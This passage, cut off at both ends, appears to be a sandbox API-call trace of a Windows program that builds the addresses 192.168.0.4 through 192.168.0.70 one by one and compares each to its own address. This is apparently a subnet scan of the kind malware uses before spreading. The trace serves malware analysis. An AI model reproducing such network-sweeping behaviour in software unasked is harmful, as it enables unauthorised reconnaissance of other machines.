returned -1 [0089.889] malloc (_Size=0x1c) returned 0x1fa0a98 [0089.889] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fa0a98 | out: ListHead=0x1fa03e8, ListEntry=0x1fa0a98) returned 0x1fa0330 [0089.889] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.4") returned 11 [0089.889] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.4") returned -1 [0089.889] malloc (_Size=0x1c) returned 0x1ff1bc0 [0089.889] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1ff1bc0 | out: ListHead=0x1fa03e8, ListEntry=0x1ff1bc0) returned 0x1fa0a98 [0089.889] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.5") returned 11 [0089.889] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.5") returned -1 [0089.889] malloc (_Size=0x1c) returned 0x1ff1be8 [0089.889] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1ff1be8 | out: ListHead=0x1fa03e8, ListEntry=0x1ff1be8) returned 0x1ff1bc0 [0089.889] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.6") returned 11 [0089.890] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.6") returned -1 [0089.890] malloc (_Size=0x1c) returned 0x1ff1c10 [0089.890] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1ff1c10 | out: ListHead=0x1fa03e8, ListEntry=0x1ff1c10) returned 0x1ff1be8 [0089.890] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.7") returned 11 [0089.890] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.7") returned -1 [0089.890] malloc (_Size=0x1c) returned 0x77d800 [0089.890] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77d800 | out: ListHead=0x1fa03e8, ListEntry=0x77d800) returned 0x1ff1c10 [0089.890] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.8") returned 11 [0089.890] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.8") returned -1 [0089.890] malloc (_Size=0x1c) returned 0x77d828 [0089.890] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77d828 | out: ListHead=0x1fa03e8, ListEntry=0x77d828) returned 0x77d800 [0089.890] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.9") returned 11 [0089.890] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.9") returned -1 [0089.890] malloc (_Size=0x1c) returned 0x77d850 [0089.890] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77d850 | out: ListHead=0x1fa03e8, ListEntry=0x77d850) returned 0x77d828 [0089.890] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.10") returned 12 [0089.890] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.10") returned 1 [0089.890] malloc (_Size=0x1c) returned 0x77d878 [0089.890] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77d878 | out: ListHead=0x1fa03e8, ListEntry=0x77d878) returned 0x77d850 [0089.890] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.11") returned 12 [0089.890] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.11") returned 1 [0089.890] malloc (_Size=0x1c) returned 0x77d8a0 [0089.890] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77d8a0 | out: ListHead=0x1fa03e8, ListEntry=0x77d8a0) returned 0x77d878 [0089.890] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.12") returned 12 [0089.890] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.12") returned 1 [0089.891] malloc (_Size=0x1c) returned 0x77d8c8 [0089.891] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77d8c8 | out: ListHead=0x1fa03e8, ListEntry=0x77d8c8) returned 0x77d8a0 [0089.891] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.13") returned 12 [0089.891] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.13") returned 1 [0089.891] malloc (_Size=0x1c) returned 0x77d8f0 [0089.891] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77d8f0 | out: ListHead=0x1fa03e8, ListEntry=0x77d8f0) returned 0x77d8c8 [0089.891] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.14") returned 12 [0089.891] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.14") returned 1 [0089.891] malloc (_Size=0x1c) returned 0x77d918 [0089.891] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77d918 | out: ListHead=0x1fa03e8, ListEntry=0x77d918) returned 0x77d8f0 [0089.891] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.15") returned 12 [0089.891] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.15") returned -1 [0089.891] malloc (_Size=0x1c) returned 0x77d940 [0089.891] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77d940 | out: ListHead=0x1fa03e8, ListEntry=0x77d940) returned 0x77d918 [0089.891] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.16") returned 12 [0089.891] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.16") returned -1 [0089.891] malloc (_Size=0x1c) returned 0x77d968 [0089.891] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77d968 | out: ListHead=0x1fa03e8, ListEntry=0x77d968) returned 0x77d940 [0089.891] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.17") returned 12 [0089.891] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.17") returned -1 [0089.891] malloc (_Size=0x1c) returned 0x2071f58 [0089.891] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2071f58 | out: ListHead=0x1fa03e8, ListEntry=0x2071f58) returned 0x77d968 [0089.891] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.18") returned 12 [0089.891] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.18") returned -1 [0089.891] malloc (_Size=0x1c) returned 0x2071f80 [0089.891] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2071f80 | out: ListHead=0x1fa03e8, ListEntry=0x2071f80) returned 0x2071f58 [0089.892] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.19") returned 12 [0089.892] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.19") returned -1 [0089.892] malloc (_Size=0x1c) returned 0x2071fa8 [0089.892] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2071fa8 | out: ListHead=0x1fa03e8, ListEntry=0x2071fa8) returned 0x2071f80 [0089.892] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.20") returned 12 [0089.892] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.20") returned -1 [0089.892] malloc (_Size=0x1c) returned 0x2071fd0 [0089.892] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2071fd0 | out: ListHead=0x1fa03e8, ListEntry=0x2071fd0) returned 0x2071fa8 [0089.892] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.21") returned 12 [0089.892] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.21") returned -1 [0089.892] malloc (_Size=0x1c) returned 0x2071ff8 [0089.892] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2071ff8 | out: ListHead=0x1fa03e8, ListEntry=0x2071ff8) returned 0x2071fd0 [0089.892] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.22") returned 12 [0089.892] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.22") returned -1 [0089.892] malloc (_Size=0x1c) returned 0x2072020 [0089.892] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072020 | out: ListHead=0x1fa03e8, ListEntry=0x2072020) returned 0x2071ff8 [0089.892] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.23") returned 12 [0089.892] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.23") returned -1 [0089.892] malloc (_Size=0x1c) returned 0x2072048 [0089.892] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072048 | out: ListHead=0x1fa03e8, ListEntry=0x2072048) returned 0x2072020 [0089.892] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.24") returned 12 [0089.892] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.24") returned -1 [0089.892] malloc (_Size=0x1c) returned 0x2072070 [0089.892] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072070 | out: ListHead=0x1fa03e8, ListEntry=0x2072070) returned 0x2072048 [0089.892] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.25") returned 12 [0089.893] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.25") returned -1 [0089.893] malloc (_Size=0x1c) returned 0x2072098 [0089.893] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072098 | out: ListHead=0x1fa03e8, ListEntry=0x2072098) returned 0x2072070 [0089.893] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.26") returned 12 [0089.893] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.26") returned -1 [0089.893] malloc (_Size=0x1c) returned 0x20720c0 [0089.893] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20720c0 | out: ListHead=0x1fa03e8, ListEntry=0x20720c0) returned 0x2072098 [0089.893] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.27") returned 12 [0089.893] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.27") returned -1 [0089.893] malloc (_Size=0x1c) returned 0x20720e8 [0089.893] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20720e8 | out: ListHead=0x1fa03e8, ListEntry=0x20720e8) returned 0x20720c0 [0089.893] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.28") returned 12 [0089.893] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.28") returned -1 [0089.893] malloc (_Size=0x1c) returned 0x2072110 [0089.893] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072110 | out: ListHead=0x1fa03e8, ListEntry=0x2072110) returned 0x20720e8 [0089.893] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.29") returned 12 [0089.893] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.29") returned -1 [0089.893] malloc (_Size=0x1c) returned 0x2072138 [0089.893] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072138 | out: ListHead=0x1fa03e8, ListEntry=0x2072138) returned 0x2072110 [0089.893] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.30") returned 12 [0089.893] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.30") returned -1 [0089.893] malloc (_Size=0x1c) returned 0x2072160 [0089.893] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072160 | out: ListHead=0x1fa03e8, ListEntry=0x2072160) returned 0x2072138 [0089.893] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.31") returned 12 [0089.893] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.31") returned -1 [0089.893] malloc (_Size=0x1c) returned 0x2072188 [0089.893] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072188 | out: ListHead=0x1fa03e8, ListEntry=0x2072188) returned 0x2072160 [0089.894] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.32") returned 12 [0089.894] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.32") returned -1 [0089.894] malloc (_Size=0x1c) returned 0x20721b0 [0089.894] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20721b0 | out: ListHead=0x1fa03e8, ListEntry=0x20721b0) returned 0x2072188 [0089.894] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.33") returned 12 [0089.894] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.33") returned -1 [0089.894] malloc (_Size=0x1c) returned 0x20721d8 [0089.894] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20721d8 | out: ListHead=0x1fa03e8, ListEntry=0x20721d8) returned 0x20721b0 [0089.894] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.34") returned 12 [0089.894] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.34") returned -1 [0089.894] malloc (_Size=0x1c) returned 0x2072200 [0089.894] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072200 | out: ListHead=0x1fa03e8, ListEntry=0x2072200) returned 0x20721d8 [0089.894] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.35") returned 12 [0089.894] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.35") returned -1 [0089.894] malloc (_Size=0x1c) returned 0x2072228 [0089.894] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072228 | out: ListHead=0x1fa03e8, ListEntry=0x2072228) returned 0x2072200 [0089.894] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.36") returned 12 [0089.894] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.36") returned -1 [0089.894] malloc (_Size=0x1c) returned 0x2072250 [0089.894] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072250 | out: ListHead=0x1fa03e8, ListEntry=0x2072250) returned 0x2072228 [0089.894] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.37") returned 12 [0089.894] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.37") returned -1 [0089.894] malloc (_Size=0x1c) returned 0x2072278 [0089.894] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072278 | out: ListHead=0x1fa03e8, ListEntry=0x2072278) returned 0x2072250 [0089.894] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.38") returned 12 [0089.894] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.38") returned -1 [0089.894] malloc (_Size=0x1c) returned 0x20722a0 [0089.895] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20722a0 | out: ListHead=0x1fa03e8, ListEntry=0x20722a0) returned 0x2072278 [0089.895] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.39") returned 12 [0089.895] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.39") returned -1 [0089.895] malloc (_Size=0x1c) returned 0x20722c8 [0089.895] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20722c8 | out: ListHead=0x1fa03e8, ListEntry=0x20722c8) returned 0x20722a0 [0089.895] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.40") returned 12 [0089.895] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.40") returned -1 [0089.895] malloc (_Size=0x1c) returned 0x20722f0 [0089.895] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20722f0 | out: ListHead=0x1fa03e8, ListEntry=0x20722f0) returned 0x20722c8 [0089.895] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.41") returned 12 [0089.895] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.41") returned -1 [0089.895] malloc (_Size=0x1c) returned 0x2072318 [0089.895] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072318 | out: ListHead=0x1fa03e8, ListEntry=0x2072318) returned 0x20722f0 [0089.895] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.42") returned 12 [0089.895] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.42") returned -1 [0089.895] malloc (_Size=0x1c) returned 0x2072340 [0089.895] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072340 | out: ListHead=0x1fa03e8, ListEntry=0x2072340) returned 0x2072318 [0089.895] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.43") returned 12 [0089.895] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.43") returned -1 [0089.895] malloc (_Size=0x1c) returned 0x2072368 [0089.895] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072368 | out: ListHead=0x1fa03e8, ListEntry=0x2072368) returned 0x2072340 [0089.895] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.44") returned 12 [0089.895] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.44") returned -1 [0089.895] malloc (_Size=0x1c) returned 0x2072390 [0089.895] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072390 | out: ListHead=0x1fa03e8, ListEntry=0x2072390) returned 0x2072368 [0089.895] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.45") returned 12 [0089.896] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.45") returned -1 [0089.896] malloc (_Size=0x1c) returned 0x20723b8 [0089.896] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20723b8 | out: ListHead=0x1fa03e8, ListEntry=0x20723b8) returned 0x2072390 [0089.896] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.46") returned 12 [0089.896] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.46") returned -1 [0089.896] malloc (_Size=0x1c) returned 0x20723e0 [0089.896] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20723e0 | out: ListHead=0x1fa03e8, ListEntry=0x20723e0) returned 0x20723b8 [0089.896] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.47") returned 12 [0089.896] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.47") returned -1 [0089.896] malloc (_Size=0x1c) returned 0x2072408 [0089.896] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072408 | out: ListHead=0x1fa03e8, ListEntry=0x2072408) returned 0x20723e0 [0089.896] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.48") returned 12 [0089.896] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.48") returned -1 [0089.896] malloc (_Size=0x1c) returned 0x2072430 [0089.896] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072430 | out: ListHead=0x1fa03e8, ListEntry=0x2072430) returned 0x2072408 [0089.896] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.49") returned 12 [0089.896] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.49") returned -1 [0089.896] malloc (_Size=0x1c) returned 0x2072458 [0089.896] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072458 | out: ListHead=0x1fa03e8, ListEntry=0x2072458) returned 0x2072430 [0089.896] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.50") returned 12 [0089.896] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.50") returned -1 [0089.896] malloc (_Size=0x1c) returned 0x2072480 [0089.896] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072480 | out: ListHead=0x1fa03e8, ListEntry=0x2072480) returned 0x2072458 [0089.896] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.51") returned 12 [0089.896] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.51") returned -1 [0089.896] malloc (_Size=0x1c) returned 0x20724a8 [0089.896] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20724a8 | out: ListHead=0x1fa03e8, ListEntry=0x20724a8) returned 0x2072480 [0089.896] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.52") returned 12 [0089.897] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.52") returned -1 [0089.897] malloc (_Size=0x1c) returned 0x20724d0 [0089.897] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20724d0 | out: ListHead=0x1fa03e8, ListEntry=0x20724d0) returned 0x20724a8 [0089.897] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.53") returned 12 [0089.897] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.53") returned -1 [0089.897] malloc (_Size=0x1c) returned 0x20724f8 [0089.897] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20724f8 | out: ListHead=0x1fa03e8, ListEntry=0x20724f8) returned 0x20724d0 [0089.897] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.54") returned 12 [0089.897] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.54") returned -1 [0089.897] malloc (_Size=0x1c) returned 0x2072520 [0089.897] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072520 | out: ListHead=0x1fa03e8, ListEntry=0x2072520) returned 0x20724f8 [0089.897] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.55") returned 12 [0089.897] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.55") returned -1 [0089.897] malloc (_Size=0x1c) returned 0x2072548 [0089.897] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072548 | out: ListHead=0x1fa03e8, ListEntry=0x2072548) returned 0x2072520 [0089.897] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.56") returned 12 [0089.897] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.56") returned -1 [0089.897] malloc (_Size=0x1c) returned 0x2072570 [0089.897] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072570 | out: ListHead=0x1fa03e8, ListEntry=0x2072570) returned 0x2072548 [0089.897] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.57") returned 12 [0089.897] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.57") returned -1 [0089.897] malloc (_Size=0x1c) returned 0x2072598 [0089.897] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072598 | out: ListHead=0x1fa03e8, ListEntry=0x2072598) returned 0x2072570 [0089.897] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.58") returned 12 [0089.898] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.58") returned -1 [0089.898] malloc (_Size=0x1c) returned 0x20725c0 [0089.898] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20725c0 | out: ListHead=0x1fa03e8, ListEntry=0x20725c0) returned 0x2072598 [0089.898] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.59") returned 12 [0089.898] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.59") returned -1 [0089.898] malloc (_Size=0x1c) returned 0x20725e8 [0089.898] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20725e8 | out: ListHead=0x1fa03e8, ListEntry=0x20725e8) returned 0x20725c0 [0089.898] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.60") returned 12 [0089.898] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.60") returned -1 [0089.898] malloc (_Size=0x1c) returned 0x2072610 [0089.898] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072610 | out: ListHead=0x1fa03e8, ListEntry=0x2072610) returned 0x20725e8 [0089.898] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.61") returned 12 [0089.898] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.61") returned -1 [0089.898] malloc (_Size=0x1c) returned 0x2072638 [0089.898] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072638 | out: ListHead=0x1fa03e8, ListEntry=0x2072638) returned 0x2072610 [0089.898] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.62") returned 12 [0089.898] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.62") returned -1 [0089.898] malloc (_Size=0x1c) returned 0x2072660 [0089.898] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072660 | out: ListHead=0x1fa03e8, ListEntry=0x2072660) returned 0x2072638 [0089.898] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.63") returned 12 [0089.898] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.63") returned -1 [0089.898] malloc (_Size=0x1c) returned 0x2072688 [0089.898] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072688 | out: ListHead=0x1fa03e8, ListEntry=0x2072688) returned 0x2072660 [0089.898] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.64") returned 12 [0089.898] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.64") returned -1 [0089.898] malloc (_Size=0x1c) returned 0x20726b0 [0089.898] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20726b0 | out: ListHead=0x1fa03e8, ListEntry=0x20726b0) returned 0x2072688 [0089.899] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.65") returned 12 [0089.899] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.65") returned -1 [0089.899] malloc (_Size=0x1c) returned 0x20726d8 [0089.899] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20726d8 | out: ListHead=0x1fa03e8, ListEntry=0x20726d8) returned 0x20726b0 [0089.899] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.66") returned 12 [0089.899] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.66") returned -1 [0089.899] malloc (_Size=0x1c) returned 0x2072700 [0089.899] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072700 | out: ListHead=0x1fa03e8, ListEntry=0x2072700) returned 0x20726d8 [0089.899] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.67") returned 12 [0089.899] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.67") returned -1 [0089.899] malloc (_Size=0x1c) returned 0x2072758 [0089.899] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072758 | out: ListHead=0x1fa03e8, ListEntry=0x2072758) returned 0x2072700 [0089.899] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.68") returned 12 [0089.899] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.68") returned -1 [0089.899] malloc (_Size=0x1c) returned 0x2072780 [0089.899] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072780 | out: ListHead=0x1fa03e8, ListEntry=0x2072780) returned 0x2072758 [0089.899] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.69") returned 12 [0089.899] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.69") returned -1 [0089.899] malloc (_Size=0x1c) returned 0x20727a8 [0089.899] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20727a8 | out: ListHead=0x1fa03e8, ListEntry=0x20727a8) returned 0x2072780 [0089.899] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.70") returned 12 [0089.899] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.70") returned -1 [0089.899] malloc (_Size=0x1c) returned 0x20727d0 [0089.899] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20727d0 | out: ListHead=0x1fa03e8, ListEntry=0x20727d0) returned 0x20727a8 [0089.899] wsprintfA (in: 